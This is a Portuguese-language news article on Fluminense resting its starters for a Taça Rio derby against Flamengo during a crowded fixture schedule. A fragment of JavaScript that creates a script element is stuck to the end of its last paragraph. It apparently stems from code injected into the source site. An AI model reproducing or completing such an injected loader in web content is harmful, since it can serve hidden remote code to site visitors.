Flu vai com reservas para encarar o Fla pela Taça Rio

Abelão quer evitar perder atletas por lesão na maratona de jogos. Foto: Nelson Perez/Fluminense F.C.

O Fluminense vai começar a partir deste fim de semana a enfrentar uma maratona de jogos, muito deles decisivos. O Tricolor enfrenta o Flamengo, às 16h, no Estádio Kléber Andrade, em Cariacica (ES), pela última rodada da fase de classificação da Taça Rio, segundo turno do Campeonato Carioca. Porém, essa não é a única competição que o time terá pela frente no próximo mês. Copa do Brasil, Copa Sul-Americana e Primeira Liga também apresentarão decisões para o time das Laranjeiras. Por conta disso, o técnico Abel Braga avisou que vai preservar todos os titulares no clássico.

Com dez pontos conquistados, na liderança do Grupo C, o Tricolor dificilmente vai deixar de se classificar para as semifinais da Taça Rio. “Não vou usar nenhum titular contra o Flamengo, pois não posso. Na próxima quarta-feira tem a estreia na Copa Sul-Americana, o reencontro com o Maracanã e não podemos pensar em tropeçar”, disse Abel.

Na próxima quarta-feira o Flu estreia na Sul-Americana recebendo o Liverpool, do Uruguai. No outro fim de semana, confirmando a vaga nas semifinais da Taça Rio, o Tricolor vai duelar pela competição. Nos dias 13 e 19 de abril tem duelos de ida e volta contra o Goiás pela Copa do Brasil,  que podem levá-lo às oitavas de final. Já no dia 26, tem choque com o Brasil de Pelotas para definir a classificação às quartas de final da Primeira Liga.

Com essa rotina de decisões, Abel Braga se preocupa em não perder jogadores por lesão. “Nós temos um planejamento, uma maneira de trabalhar que visa preservar a integridade dos atletas, pois não queremos perder ninguém por um longo tempo. Do mesmo modo nós queremos muito seguir jogando bastante, pois aí é sinal de que estamos avançando”, afirmou Abel.

Para não correr riscos de lesão, Abel cancelou o treino previsto para esta quinta-feira e deu folga aos jogadores. A reapresentação será amanhã.var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário